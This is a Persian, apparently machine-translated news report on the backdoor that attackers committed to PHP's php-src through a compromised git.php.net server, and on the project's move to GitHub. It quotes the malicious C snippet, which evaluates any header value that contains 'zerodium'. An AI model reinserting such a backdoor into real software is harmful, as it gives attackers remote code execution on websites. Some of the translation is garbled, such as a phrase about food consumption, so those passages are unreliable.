[ad_1]

یک در کارتون به یک دیوار با کد کامپیوتر منتهی می شود.

اعضای پروژه منبع باز گفتند که هکر سرور مورد استفاده برای توزیع زبان برنامه نویسی PHP را به خطر انداخته و یک درب پشتی به کد منبع اضافه کرده است که باعث می شود وب سایت ها در برابر مصرف کامل مواد غذایی آسیب پذیر شوند.

دو به روزرسانی که آخر هفته به سرور PHP Git ارسال شده بود ، خطی را اضافه کرد که اگر از طریق وب سایت PHP اجرا شود ، به بازدیدکنندگان امکان اجرای کد دلخواه خود را بدون اجازه می دهد. تعهدات مخرب در اینجا و اینجا به کد امکان تزریق کد به بازدیدکنندگانی را می دهد که در هدر HTTP کلمه “zerodium” را داشتند.

PHP.net هک شده ، کد همراه با پشتیبان

تعهدات به مخزن php-src تحت نام حساب دو توسعه دهنده معروف PHP ، Rasmus Lerdorf و Nikita Popov انجام شد. پوپوف در بیانیه ای که یکشنبه شب منتشر شد نوشت: “ما هنوز دقیقاً نمی دانیم که این اتفاق چگونه افتاده است ، اما همه چیز به مصالحه در سرور git.php.net (و نه مصالحه در یک حساب git جداگانه) اشاره دارد.”

پس از مصالحه ، پوپوف گفت که طرفداران PHP به این نتیجه رسیده اند که زیرساخت مستقل Git آنها یک خطر امنیتی غیر ضروری است. در نتیجه ، آنها سرور git.php.net را خاموش کرده و GitHub را به منبع رسمی مخازن PHP تبدیل خواهند کرد. از این پس ، تمام تغییرات در کد منبع PHP مستقیماً در GitHub انجام می شود ، نه در git.php.net.

این تغییرات سوicious ، حداکثر یکشنبه شب توسط توسعه دهندگان ، از جمله مارکوس ستاد ، جیک بیرچالف و مایکل وورزیشک ، هنگام بررسی تعهد متعهد شده در روز شنبه ، مورد توجه مردم قرار گرفت. این به روزرسانی که هدف آن تصحیح اشتباه تایپی است ، تحت حسابی ساخته شده است که از نام لردورف استفاده می کند. اندکی پس از کشف اول ، ووشیچک متوجه دومین رابطه مخرب شد که با نام حساب پوپوف انجام شد. قرار بود تصحیح اشتباه تایپی قبلی را برگرداند.

هر دو اصلاح خطوط یکسانی کد را اضافه کردند:

onvert_to_string(enc);
	if (strstr(Z_STRVAL_P(enc), "zerodium")) {
		zend_try {
			zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");

Zerodium واسطه ای است که سو استفاده از محققان را خریداری می کند و آنها را به سازمانهای دولتی می فروشد تا در تحقیقات یا اهداف دیگر استفاده کند. اینکه چرا کمیته ها از Zerodium نام بردند روشن نیست. Chauki Beckar ، مدیر عامل شرکت ، روز دوشنبه گفت در توییتر که او شرکت نکرد.

وی نوشت: “به سلامتی ترول هایی كه Zerodium را در تعهد به خطر افتاده PHP git امروز قرار دادند.” “بدیهی است که ما کاری با آن نداریم. احتمالاً محقق یا محققانی که این اشکال / بهره برداری را کشف کرده اند سعی کرده اند آن را به اشخاص زیادی بفروشند ، اما کسی نخواسته این مزخرفات را بخرد ، بنابراین او آن را برای سرگرمی سوزاند.

کارما بد

قبل از مصالحه ، PHP Group با استفاده از آنچه پوپوف آن را “تولید داخل” نامیده است به نام Karma ، کلیه سوابق دسترسی به ذخیره سازی را بر روی سرور git http://git.php.net/ پردازش می کند. بسته به مشارکت های قبلی ، سطوح مختلف دسترسی به توسعه دهندگان را فراهم می کند. در همین حال ، GitHub مخزن آینه ها بود.

اکنون گروه PHP زیرساخت git خود میزبانی شده و مدیریت شده را رها کرده و GitHub را جایگزین آن می کند. این تغییر به این معنی است که GitHub اکنون مخزن “شرعی” است. PHP Group دیگر از سیستم کارما استفاده نخواهد کرد. در عوض ، مشارکت کنندگان باید بخشی از سازمان PHP GitHub باشند و باید از احراز هویت دو عاملی برای حساب های مرتکب استفاده کنند.

رویداد این آخر هفته اولین باری نیست که سرورهای php.net با هدف حمله به زنجیره تأمین شکسته می شوند. در اوایل سال 2019 ، مخزن پر کاربرد PHP برای برنامه های افزودنی و برنامه ها پس از کشف هکرها به طور موقت بیشتر سایت را خاموش کرد و مدیر بسته اصلی را با برنامه مخرب جایگزین کرد. توسعه دهندگان این گروه گفتند هرکسی که مدیر بسته را در شش ماه گذشته بارگیری کرده باید نسخه جدید آن را دریافت کند.

PHP حدود 80٪ وب سایت ها را پشتیبانی می کند. هیچ گزارشی از وب سایت های مربوط به تغییرات مخرب در محیط تولید آنها گزارش نشده است.

HD Moore ، بنیانگذار و مدیر عامل پلتفرم کشف ، گفت: این تغییرات احتمالاً توسط افرادی ایجاد شده است که می خواهند از دسترسی غیر مجاز خود به سرور PHP Git لاف بزنند ، نه کسانی که در واقع سعی در استفاده از وب سایت هایی دارند که از PHP استفاده می کنند. شبکه Rumble.

وی به “آرس” گفت: “به نظر می رسد مهاجمان Zerodium را ترول می كنند یا سعی می كنند این تصور را داشته باشند كه كد برای مدت طولانی تری در فضای باز است”. “به هر حال ، اگر علاقه به امنیت در PHP داشتم ، زمان زیادی را برای گذراندن تعهدات قبلی می گذراندم.”



[ad_2]

منبع: tarjome-news.ir